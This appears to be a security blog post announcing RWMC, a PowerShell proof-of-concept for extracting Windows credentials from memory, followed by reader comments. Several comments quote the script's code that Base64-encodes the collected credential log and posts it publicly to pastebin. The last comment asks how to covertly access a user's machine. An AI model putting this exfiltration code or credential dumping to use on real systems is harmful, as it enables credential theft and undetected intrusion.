RWMC – Retrieve Windows Credentials With PowerShell

Use Netsparker


RWMC is a Windows PowerShell script written as a proof of concept to Retrieve Windows Credentials using only PowerShell and CDB command-line options (Windows Debuggers).

RWMC - Retrieve Windows Credentials With PowerShell

It allows to retrieve credentials from Windows 2003 to 2012 and Windows 10 (It was tested on 2003, 2008r2, 2012, 2012r2 and Windows 7 – 32 and 64 bits, Windows 8 and Windows 10 Home edition).

The script is different from Mimikatz or WCE because it doesn’t work with system .dlls to decrypt data. All the decryptions are made in the script.

Features

The main features of RWMC:

  • Fully PowerShell
  • Works locally, remotely or from a dump file collected on a machine
  • Doesn’t use .dll files to locate credentials address in memory but a simple Microsoft debugger
  • Doesn’t use OS .dll files to decipher passwords collected (AES, TripleDES, DES-X)
  • Breaks undocumented Microsoft DES-X
  • Works even if you are on a different architecture than the target
  • Leaves no trace in memory

Requirements

To run this script effectively you need:

  • PowerShell 3
  • Allow PowerShell script on you machine, example : Set-ExecutionPolicy Unrestricted -force
  • An Internet Connection

You can download RWMC here:

RWMC-master.zip

Or read more here.

Posted in: Hacking Tools, Password Cracking, Windows Hacking

,


Latest Posts:


Malcom - Malware Communication Analyzer Malcom – Malware Communication Analyzer
Malcom is a Malware Communication Analyzer designed to analyze a system's network communication using graphical representations of network traffic.
WepAttack - WLAN 802.11 WEP Key Hacking Tool WepAttack – WLAN 802.11 WEP Key Hacking Tool
WepAttack is a WLAN open source Linux WEP key hacking tool for breaking 802.11 WEP keys using a wordlist based dictionary attack.
Eraser - Windows Secure Erase Hard Drive Wiper Eraser – Windows Secure Erase Hard Drive Wiper
Eraser is a hard drive wiper for Windows which allows you to run a secure erase and completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns.
Insecure software versions are a problem Web Security Stats Show XSS & Outdated Software Are Major Problems
Netsparker just published some anonymized Web Security Stats about the security vulnerabilities their online solution identified on their users’ web applications and web services during the last 3 years.
CTFR - Abuse Certificate Transparency Logs For HTTPS Subdomains CTFR – Abuse Certificate Transparency Logs For HTTPS Subdomains
CTFR is a Python-based tool to Abuse Certificate Transparency Logs to get subdomains from a HTTPS website in a few seconds.
testssl.sh - Test SSL Security Including Ciphers, Protocols & Detect Flaws testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws
testssl.sh is a free command line tool to test SSL security, it checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more.


9 Responses to RWMC – Retrieve Windows Credentials With PowerShell

  1. Me January 26, 2016 at 3:53 am #

    To run this script effectively you need:
    […]
    An Internet Connection

    Why is an internet connection necessary?

    • Darknet January 26, 2016 at 5:27 pm #

      I actually wondered about that too, but honestly haven’t had time to look through the code to figure it out. Perhaps the author will answer here.

    • Sysadmin January 26, 2016 at 10:04 pm #

      @Me:
      You should parse ANY script before executing…

      From the RWMC.ps1, it’s calling set-symbolserver.
      (internet access required)
      It’s also using pastebin.com
      (internet access required)

      I’ve stopped there but there’s a bunch of EXE i’d sandbox first and there’s more ps1 files to parse.

    • Batphilt January 27, 2016 at 12:21 am #

      There is an option to past the results on pastebin.

      As you can see in the following code snippet:

      $exFiltrate = Read-Host ‘Do you want to exfiltrate the data (pastebin) ?
      1) Yes
      2) No
      0) Exit

      And the associated function:

      if($exFiltrate -eq 1 -and ![string]::IsNullOrEmpty($dev_key)) {
      Write-Progress -Activity “Exfiltrate” -status “Running…” -id 1
      $dataToExfiltrate = Get-Content $logPathName
      $utfEncodedBytes = [System.Text.Encoding]::UTF8.GetBytes($dataToExfiltrate)
      $pasteValue = [System.Convert]::ToBase64String($utfEncodedBytes)
      $pasteName = “PowerMemory (Follow the White Rabbit)”
      $url = “https://pastebin.com/api/api_post.php”
      $parameters = “&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pasteName&api_paste_code=$pasteValue&api_paste_private=0”
      Post-HttpRequest $url $parameters
      }

  2. Soldges January 26, 2016 at 6:07 pm #

    if($exFiltrate -eq 1 -and ![string]::IsNullOrEmpty($dev_key)) {
    Write-Progress -Activity “Exfiltrate” -status “Running…” -id 1
    $dataToExfiltrate = Get-Content $logPathName
    $utfEncodedBytes = [System.Text.Encoding]::UTF8.GetBytes($dataToExfiltrate)
    $pasteValue = [System.Convert]::ToBase64String($utfEncodedBytes)
    $pasteName = “PowerMemory (Follow the White Rabbit)”
    $url = “https://pastebin.com/api/api_post.php”
    $parameters = “&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pasteName&api_paste_code=$pasteValue&api_paste_private=0”
    Post-HttpRequest $url $parameters
    }

  3. ab January 26, 2016 at 6:52 pm #

    Did this work without Internet ???

  4. giMini January 30, 2016 at 10:06 am #

    Hi,

    I’m the author of this script.

    RWMC is not more supported.

    I commited it under PowerMemory suite.

    U can find the supported suite version here : https://github.com/giMini/PowerMemory

    It was presented at HackFest Québec 2015 : https://github.com/giMini/PowerMemory/blob/master/PREZ/HackFest2015.pptx

    The Internet connection is necessary to connect to the symbol server of Microsoft.

    Yes we NEED symbols to locate addresses in memory.

    The pastebin part is there to allow the exfiltration of data in pentest case.

    This can work without Internet connection, you can test it on windows 2016. Actually, I download the server symbols from Microsoft website to prove it.

    giMini

    • Sysadmin February 1, 2016 at 11:54 pm #

      @giMini:
      Thanks for the input and the clarification.

      I did attend your presentation @hackfest, that’s some inspired hack.
      If there’s a 2016 edition and I hope you’ll be there.

  5. Derrek Bergman March 4, 2016 at 2:47 am #

    A month ago I was able to use the RWMC tool completely fine. Now I can not use the power memory to get the password of a remote machine.  I am a Network Admin who needs to get into a machine and change a user account on the machine to a standard user rather than let them have admin rights.  This way I can log into that machine as Admin change the settings I need and log back in as the correct person and they would have no idea I was ever in the machine.  How do I accomplish that with Power Memory